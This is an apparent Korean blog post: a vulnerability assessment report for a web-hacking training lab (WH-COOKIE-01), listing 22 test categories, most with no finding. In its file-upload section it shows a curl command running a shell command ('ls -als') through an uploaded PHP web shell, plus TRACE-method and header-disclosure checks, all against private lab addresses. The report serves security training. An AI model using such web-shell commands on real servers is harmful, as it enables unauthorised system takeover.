홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 WH-COOKIE-01 웹해킹훈련장 취약점분석 보고서취약점분석 요약WH-COOKIE-01 훈련장은 PHP 웹쉘을 생성할 수 있는 취약점이 존재하여 웹을 통해 시스템 침투가 가능한 상황이며 저장형 XSS 공격으로 홈페이지를 위변조하여 서비스거부공격이 가능함 시스템 장악 위험성 존재
추가공격에 도움을 줄 소지가 있는 취약점
취약점 상세 설명(1) 운영체제 명령 실행- 탐지사항 없음 [참고자료]
(2) SQL 인젝션- 탐지사항 없음 [참고자료]
(3) XPath 인젝션- 탐지사항 없음 [참고자료]
(4) 정보누출- 탐지사항 없음 [참고자료]
(5) 악성콘텐츠- 탐지사항 없음 [참고자료]
(6) 크로스 사이트 스크립트(XSS)[탐지사항]
[취약점 경로]
[취약점 증빙 자료] [취약점 조치방안]
[참고자료]
(7) 약한 문자열 강도- 탐지사항 없음 [참고자료]
(8) 불충분한 인증 및 인가- 탐지사항 없음 [참고자료]
(9) 취약한 패스워드 복구- 탐지사항 없음 [참고자료]
(10) 불충분한 세션 관리- 탐지사항 없음 [참고자료]
(11) 크로스 사이트 리퀘스트 변조(CSRF)- 탐지사항 없음 [참고자료]
(12) 자동화 공격- 탐지사항 없음 [참고자료]
(13) 파일 업로드[탐지사항]
[취약점 경로]
[취약점 증빙 자료] root@kali:~# curl http://192.168.189.238/imginfo/cmd.php --data "cmd=ls -als" images/cmd.php.jpg:1480167216:400x547:148330:<pre>total 44 0 drwxrwxrwx 2 www www 260 Nov 26 13:41 . 0 drwxr-xr-x 4 tux tux 160 Nov 23 06:59 .. 4 -rw-r--r-- 1 www www 92 Apr 29 2015 14302711480.68639500.txt 4 -rw-r--r-- 1 www www 121 Apr 29 2015 14302715260.34919600.txt 4 -rw-r--r-- 1 www www 90 Apr 29 2015 14302716850.67138300.txt 4 -rw-r--r-- 1 www www 108 Apr 29 2015 14302809200.37569100.txt 4 -rw-r--r-- 1 www www 102 Nov 23 03:23 14798713610.77972700.txt 4 -rw-r--r-- 1 www www 121 Nov 23 05:08 14798714230.66950400.txt 4 -rw-r--r-- 1 www www 120 Nov 23 05:12 14798778030.18648700.txt 4 -rw-r--r-- 1 www www 109 Nov 23 05:15 14798779450.92621600.txt 4 -rw-r--r-- 1 www www 87 Nov 26 12:46 14801643120.07442400.txt 4 -rw-r--r-- 1 www www 128 Nov 26 13:41 14801672160.69267700.txt 4 -rw-r--r-- 1 www www 111 Nov 26 13:33 cmd.php .jpg:PHP code as image nameroot@kali:~# [ ↑ "imginfo/" 디렉토리에 생성된 cmd.php 파일 확인 ] [취약점 조치방안]
[참고자료]
(14) 경로추적 및 파일 다운로드- 탐지사항 없음 [참고자료]
(15) 데이터 평문전송[참고자료] - 탐지사항 없음
(16) 쿠키 변조- 탐지사항 없음 [참고자료]
(17) URL/파라미터 변조- 탐지사항 없음 [참고자료]
(18) 디렉터리 인덱싱[탐지사항]
[취약점 경로]
[취약점 증빙 자료] [취약점 조치방안]
[참고자료]
(19) 관리자페이지 노출- 탐지사항 없음 [참고자료]
(20) 위치공개- 탐지사항 없음 [참고자료]
(21) 웹 서비스 메소드 설정 공격[탐지사항]
[취약점 경로]
[취약점 증빙 자료] root@kali:~# curl -v -X TRACE http://192.168.189.221 --header "Fake: this should not be reflected" * Rebuilt URL to: http://192.168.189.221/ * Trying 192.168.189.221... * Connected to 192.168.189.221 (192.168.189.221) port 80 (#0) > TRACE / HTTP/1.1 > Host: 192.168.189.221 > User-Agent: curl/7.49.1 > Accept: */* > Fake: this should not be reflected > < HTTP/1.1 200 OK < Date: Sat, 05 Nov 2016 11:45:07 GMT < Server: Apache/2.2.21 (Unix) DAV/2 < Transfer-Encoding: chunked < Content-Type: message/http < TRACE / HTTP/1.1 Host: 192.168.189.221 User-Agent: curl/7.49.1 Accept: */* Fake: this should not be reflected * Connection #0 to host 192.168.189.221 left intact root@kali:~# [ ↑ curl을 이용하여 TRACE 메소드 점검: 헤더가 내용에 출력됨 ] [취약점 조치방안]
[참고자료]
(22) 취약한 서버 설정 (권고사항)[탐지사항]
[취약점 경로]
[취약점 증빙 자료] root@kali:~# curl -I 192.168.189.238 HTTP/1.1 200 OK Date: Sat, 26 Nov 2016 12:56:11 GMT Server: Apache X-Frame-Options: DENY X-XSS-Protection: 1 X-Content-Type-Options: nosniff X-Powered-By: PHP/5.2.17 Set-Cookie: infofile=imginfo%2F14801649710.55177400.txt Content-Type: text/html X-Pad: avoid browser bug root@kali:~# [ ↑ X-Powered-By 헤더에서 PHP 버전 노출 ] [취약점 조치방안]
[처음 작성한 날: 2016.11.26] [마지막으로 고친 날: 2016.11.26] < 이전 글 : WH-COOKIE-01: 잘못된 쿠키 사용 사례를 보여주는 웹해킹훈련장 (2016.11.24) > 다음 글 : 웹해킹 공격/방어 일람 (2016.11.21) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |